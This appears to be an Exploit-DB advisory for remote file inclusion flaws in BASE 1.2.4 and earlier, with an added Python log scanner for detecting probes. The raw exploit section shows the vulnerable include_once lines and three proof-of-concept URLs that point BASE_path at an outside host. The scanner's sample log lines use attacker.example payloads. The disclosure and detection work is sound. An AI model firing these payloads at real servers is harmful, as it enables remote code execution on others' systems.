Vendor: Basic Analysis and Security Engine (BASE)
By: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: Inclusion Vulnerabilities
Product Name: Basic Analysis and Security Engine (BASE)
Affected Version From: <= 1.2.4
Affected Version To: <= 1.2.4
Patch Exists: YES
2006

Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities

Basic Analysis and Security Engine (BASE) versions <= 1.2.4 contain file inclusion vulnerabilities. An attacker can exploit them to include arbitrary files from remote servers, which can lead to remote code execution or information disclosure.

Mitigation:

Upgrade to a patched version of BASE (>= 1.2.5) or apply appropriate security measures to prevent file inclusion vulnerabilities.

Exploit-DB raw data:

# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################

[code (base_qry_common.php)]
   include_once("$BASE_path/includes/base_signature.inc.php");
[/code]

http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&

########################################

[code (base_stat_common.php)]
   include_once("$BASE_path/includes/base_constants.inc.php");
[/code]

http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&

###############################################

[code (includes/base_include.inc.php)]
   include_once("$BASE_path/includes/base_db.inc.php");
   include_once("$BASE_path/includes/base_output_html.inc.php");
   include_once("$BASE_path/includes/base_state_common.inc.php");
   ...
[/code]

http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&

#######################################################

# milw0rm.com [2006-05-25]
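
For defenders checking whether a BASE install was probed before it was upgraded, the following is an added detection example, not part of the original advisory or of BASE itself. It scans web server access log lines for requests that set the BASE_path parameter. It assumes the combined log format; the sample log lines, client addresses and the attacker.example host are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts the advisory lists as building include paths from $BASE_path.
AFFECTED = ("base_qry_common.php", "base_stat_common.php",
            "includes/base_include.inc.php")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Values that would make include_once() read from a URL or stream wrapper.
WRAPPER_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|data:)", re.I)

def classify(line):
    """Return None, or a finding dict for a request that sets BASE_path."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # parse_qsl percent-decodes names and values, so encoded probes match too.
    values = [v for k, v in parse_qsl(target.query, keep_blank_values=True)
              if k == "BASE_path"]
    if not values:
        return None
    path = unquote(target.path)
    remote = any(WRAPPER_RE.match(v.strip()) for v in values)
    return {
        "client": line.split(" ", 1)[0],
        "path": path,
        "listed_script": any(path.endswith("/" + s) for s in AFFECTED),
        "verdict": "remote-include" if remote else "path-override",
    }

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = """\
203.0.113.7 - - [25/May/2006:10:01:02 +0000] "GET /snort/base_qry_common.php?BASE_path=http://attacker.example/x.txt? HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [25/May/2006:10:01:09 +0000] "GET /snort/includes/base_include.inc.php?BASE_path=http%3A%2F%2Fattacker.example%2Fx.txt%3F HTTP/1.1" 200 498 "-" "-"
198.51.100.4 - - [25/May/2006:10:02:30 +0000] "GET /snort/base_stat_common.php?BASE_path=../../../../tmp HTTP/1.1" 200 0 "-" "-"
192.0.2.10 - - [25/May/2006:10:03:00 +0000] "GET /snort/index.php HTTP/1.1" 200 9120 "-" "-"
"""

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a BASE_path value sent in a POST body or cookie would not show up in this scan.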